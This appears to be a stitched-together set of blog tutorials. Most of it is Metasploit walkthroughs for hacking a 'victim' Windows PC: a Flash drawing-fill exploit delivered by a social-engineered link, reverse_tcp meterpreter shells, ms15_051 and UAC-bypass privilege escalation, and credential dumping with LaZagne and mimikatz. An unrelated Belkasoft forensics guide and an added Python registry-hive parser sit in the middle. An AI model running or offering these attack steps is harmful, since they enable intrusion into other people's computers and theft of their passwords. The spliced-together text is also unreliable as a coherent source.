Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

This module exploits a memory corruption that occurs when a Shader is applied as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash; Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash; Windows 8.1, Firefox 38.0.5 and Adobe Flash; and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash.

Exploit Targets
Windows 7

Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/browser/adobe_flash_shader_drawing_fill
msf exploit (adobe_flash_shader_drawing_fill) > set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_drawing_fill) > set lhost (IP of Local Host)
msf exploit (adobe_flash_shader_drawing_fill) > set srvhost
msf exploit (adobe_flash_shader_drawing_fill) > set uripath /
msf exploit (adobe_flash_shader_drawing_fill) > exploit

Now you have a URL that you should give to your victim.

Send the link of the server to the victim via chat or email or any social engineering technique.
Now when the victim opens the link, a session will be opened.

Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Forensic Investigation of RAW Images using Belkasoft Evidence Center

First of all, download the Belkasoft Evidence Center Ultimate from this link.

Click on the New option to select the raw image.

Enter the case name.
Select the root folder where the forensic evidence will be created.
Then type the name of the investigator and the case description. Click OK.

Now select the raw image and check the Analyze Data Source option. Click on Next.

Now select from the supported data types and click on Next.

Now select all and click on Finish.

To visualize the cached sites exactly as seen by the user, click on the Cache in Browsers option.

To see the list of downloaded files, click on Downloaded Files.

To check the list of sites visited by the user, select the Sites option.

To see the cookie list, click on the Cookies option.

Now click on the Documents option and then select the Found Documents option to see all the office document files found on the user's PC.

To see all the encrypted files, click on the Found Encrypted Files option. It will detect more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files within this product by installing Passware Kit Forensic integrated with the Belkasoft product.

To find the picture list, select Found Pictures in the Pictures option. To detect forgery in a picture, right-click on the picture, select Analyze Pictures and click on the Detect Forgery tab.

To find the recent files opened by Acrobat Reader, click on the Adobe Acrobat Reader Recent option.

To see recent applications run by the user, click on the Last Application and Paths in NTUSER.DAT option. NTUSER.DAT is a registry file in the Windows operating system. Every user profile contains an NTUSER.DAT file. It contains a unique Documents folder, Start menu configuration, Desktop properties and browsing history.

To see the files last selected by the user, click on Last Selected Files.

To check the recent files opened by the user, click on the Recent Files option.

To detect the latest searches by the user, click on the Searches option.

To find the files most recently accessed by the user, click on Recently Accessed Documents.
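
The NTUSER.DAT step above depends on that file being an intact registry hive. The following Python code is an added example (not part of the original tutorial or of the Belkasoft product) and goes beyond the GUI walkthrough: it parses a hive's base block and reports the last-written time, whether the header checksum matches, and whether the hive is "dirty" (its two sequence numbers differ, so the transaction logs should be collected as well). The sample header and its values are constructed in the code; field offsets follow the publicly documented regf layout.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME epoch

def regf_checksum(block: bytes) -> int:
    """XOR the first 127 little-endian dwords; 0 and 0xFFFFFFFF are remapped."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", block[:508]):
        x ^= dword
    if x == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return 1 if x == 0 else x

def inspect_hive_header(block: bytes) -> dict:
    """Parse the base block of a hive such as NTUSER.DAT and flag integrity issues."""
    if len(block) < 512 or block[:4] != b"regf":
        raise ValueError("not a registry hive: missing 'regf' signature")
    seq1, seq2, filetime, major, minor = struct.unpack_from("<IIQII", block, 4)
    root_offset, bins_size = struct.unpack_from("<II", block, 36)
    (stored,) = struct.unpack_from("<I", block, 508)
    return {
        "version": f"{major}.{minor}",
        # FILETIME counts 100 ns ticks since 1601-01-01 UTC
        "last_written": EPOCH_1601 + timedelta(microseconds=filetime // 10),
        "root_cell_offset": root_offset,
        "hive_bins_size": bins_size,
        "file_name": block[48:112].decode("utf-16-le", "replace").rstrip("\x00"),
        "checksum_ok": stored == regf_checksum(block),
        # unequal sequence numbers: the last write was not completed cleanly
        "dirty": seq1 != seq2,
    }

def build_sample_header(seq1: int, seq2: int) -> bytes:
    """Constructed sample base block (not taken from a real system)."""
    block = bytearray(4096)
    block[:4] = b"regf"
    filetime = 130_800_096_000_000_000  # constructed: 2015-06-29 00:00:00 UTC
    struct.pack_into("<IIQII", block, 4, seq1, seq2, filetime, 1, 5)
    struct.pack_into("<IIII", block, 28, 0, 1, 0x20, 0x1000)  # type, format, root, size
    name = "\\NTUSER.DAT".encode("utf-16-le")
    block[48:48 + len(name)] = name
    struct.pack_into("<I", block, 508, regf_checksum(bytes(block)))
    return bytes(block)

if __name__ == "__main__":
    for label, hdr in (("clean", build_sample_header(7, 7)), ("dirty", build_sample_header(8, 7))):
        print(label, inspect_hive_header(hdr))
```

To check a real hive, pass the first 4096 bytes of the file exported from the image to inspect_hive_header.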

Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have the meterpreter session, use the 'shell' command to get a command prompt on the target.

Now download the LaZagne project from here and extract it on your PC. You can find the lazagne.exe file in the folder.

Now use the upload command to send a file to the target system.

To launch all modules, type laZagne.exe all. It will dump all the passwords that it can find, such as all saved passwords in Google Chrome.

You can see Windows secret passwords.

You can see all saved Wi-Fi profile passwords.

Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Exploit Targets
Windows 7

Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/local/ms15_051_client_copy_image
msf exploit (ms15_051_client_copy_image) > set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_051_client_copy_image) > set lhost (IP of Local Host)
msf exploit (ms15_051_client_copy_image) > set session 1
msf exploit (ms15_051_client_copy_image) > exploit

Hack the Password in Plain text of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a remote shell with Metasploit, use the Bypass UAC module, set the session number and exploit it.

use exploit/windows/local/bypassuac
msf exploit (bypassuac_injection) > set session 1
msf exploit (bypassuac_injection) > exploit

mimikatz is a tool I've made to learn C and make some experiments with Windows security. It's now well known to extract plaintext passwords, hash, PIN code and kerberos tickets from memory.

Now type load kiwi. Then type "creds_all":